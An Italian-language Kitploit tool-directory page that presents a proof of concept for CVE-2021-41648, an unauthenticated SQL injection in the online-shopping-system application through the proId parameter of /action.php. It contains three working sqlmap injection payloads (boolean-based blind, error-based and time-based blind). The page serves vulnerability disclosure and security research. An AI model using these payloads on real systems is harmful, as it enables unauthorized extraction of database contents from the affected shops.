Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-41648 — Exploit proof-of-concept per SQL injection non autenticata in online-shopping-system tramite il parametro proId, che consente l'estrazione di dati dal database MySQL. | Kitploit
Strumenti/GitHubGitHub/mobiusbinary/cve-2021-41648
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubmobiusbinary/cve-2021-41648

CVE-2021-41648

Exploit proof-of-concept per SQL injection non autenticata in online-shopping-system tramite il parametro proId, che consente l'estrazione di dati dal database MySQL.

Vedi Repository
24 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-41648

CVE-2021-41648 SQL Injection in online-shopping-system

online-shopping-system è vulnerabile ad attacchi SQL Injection non autenticati di tipo error/boolean-based blind ed error-based.

Il parametro proId della pagina /action.php non sanitizza l'input dell'utente; un attaccante può estrarre dati sensibili dal database MySQL sottostante.

Link all'applicazione

online-shopping-system

Componenti e Parametro Interessati

URL: /action.php
PARAMETRO: proId

PoC

SQLMAP PAYLOADS

Parametro proId nella pagina /action.php

Parametro: proId (POST) Tipo: boolean-based blind Titolo: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1

Tipo: error-based Titolo: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1

Tipo: time-based blind Titolo: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

Se l'immagine del PoC non è chiara, fai clic sulla GIF per caricarla con una risoluzione migliore.

POC - proId

Scoperto da

Jason Colyvas
MOBIUSBINARY
21 settembre 2021

Scarica lo strumento